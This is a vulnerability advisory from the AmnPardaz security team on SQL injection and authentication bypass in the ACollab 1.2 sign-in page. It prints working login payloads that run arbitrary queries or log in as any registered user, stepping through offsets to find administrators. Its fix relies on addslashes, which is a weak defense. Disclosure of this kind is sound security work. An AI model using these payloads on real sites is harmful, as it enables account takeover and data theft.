|
##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title:=09=09ACollab Multiple Vulnerabilities
# Vendor:=09=09http://www.atutor.ca/acollab
# Vulnerable Version:=091.2 (Latest version till now)
# Exploitation:=09=09Remote with browser
# Fix:=09=09=09=09=09N/A
###################################################################################
####################
- Description:
####################
ACollab as described by its vendor is an accessible, open source,
multi-group, Web-based collaborative
work environment. ACollab is available as a standalone collaborative
work environment that will run on
its own. ACollab is ideal for groups working at a distance developing
documentation, collaborating on
research, or writing joint papers.
####################
- Vulnerability:
####################
+--> SQL Injection
=09All of the parameters are sanitized correctly before being used in
SQL queries else of
=09the POST parameters 'login' and 'password' in the "sign_in.php" page.
These parameters
=09can be used for injecting arbitrary SQL queries; the 'login'
parameter is single quoted
=09and the 'password' parameter is single parenthesized, single quoted.
+--> Authentication Bypass
=09The ACollab CMS uses two mechanism for authentication. One for master
admin user which is
=09based on a hard coded username/password initialized in the
installation process. And a DB-based
=09authentication for all other users, including the group
administrators which can add/remove/edit
=09all posts and news and ... from forums and first screen of the
website. The second authentication
=09mechanism can be bypassed.
####################
- Exploits/PoCs:
####################
+--> Exploiting The (MySQL) SQL Injection Vulnerability:
=09Go to the sign in page at "victim.net/ACollab/sign_in.php" and use
the following vectors for injecting
=09your desired SQL query, namely $Q:
=09 - In the Username field (login POST parameter): ' or $Q or ''='
=09 - In the Password field (password POST parameter): ') or $Q or (''='
+--> Exploiting The Authentication Bypass Vulnerability:
=09You can login as anyone of the registered users of ACollab CMS by
providing following vector
=09as username and nothing as password:
=09 'or''='' limit 1 offset 0 -- '
=09Above vector will log you as the first user according to its member
id order. You can login as other
=09users, searching for a group administrator account, by following vectors:
=09 'or''='' limit 1 offset 0 -- '
=09 'or''='' limit 1 offset 1 -- '
=09 'or''='' limit 1 offset 2 -- '
=09 ....
####################
- Solution:
####################
Add the following command
$_POST['login'] = addslashes ($_POST['login']);
$_POST['password'] = addslashes ($_POST['password']);
at the line 46 of 'sign_in.php' file.
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_72.htm
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com